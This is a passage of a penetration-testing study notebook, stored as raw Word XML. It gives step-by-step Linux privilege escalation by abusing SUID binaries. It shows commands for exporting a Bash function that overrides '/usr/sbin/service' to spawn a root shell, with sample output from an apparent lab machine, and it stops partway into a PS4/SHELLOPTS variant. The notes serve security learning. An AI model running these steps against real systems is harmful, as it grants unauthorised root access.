    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jf08wu3pgnkc" w:id="289"/>
      <w:bookmarkEnd w:id="289"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Shell Features (#1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002110">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Tib3rius SUID Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002111">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002112">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002113">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Old Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some shells (notably Bash &lt;4.2-048) it is possible to define user functions with an absolute path name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002115">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These functions can be exported so that subprocesses have access to them, and the functions can take precedence over the actual executable being called</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002116">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002117">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002118">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002119">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-env2 file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strings /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002120">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file could be trying to run the /usr/sbin/service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify this with strace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strace -v -f -e execve /usr/local/bin/suid-env2 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002125">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[pid 16729] execve("/bin/sh", ["sh", "-c", "/usr/sbin/service apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002126">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start"]...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002127">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally, we can also verify with ltrace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ ltrace /usr/local/bin/suid-env2 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002129">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/usr/sbin/service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals that the system function is being used to execute the /usr/sbin/service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the version of Bash is lower than 4.2-048</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a Bash function with the name “/usr/sbin/service” and export the function:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ function /usr/sbin/service { /bin/bash -p; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ export –f /usr/sbin/service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002131">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the SUID file for a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002133">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@debian:~# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root) …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002135">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002136">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002137">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k8h1ybv0rmis" w:id="290"/>
      <w:bookmarkEnd w:id="290"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Shell Features (#2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002138">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002139">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Tib3rius SUID Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash Debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash has a debugging mode which can be enabled with the –x command line option, or by modifying the SHELLOPTS environment variable to include xtrace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, SHELLOPTS is read only, however the env command allows SHELLOPTS to be set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debug statements. This variable can include an embedded command, which will execute every time it is shown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002140">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002141">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a SUID file runs another program via Bash (e.g. by using system() ) these environment variables can be inherited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002142">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If an SUID file is being executed, this command will execute with the privileges of the file owner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
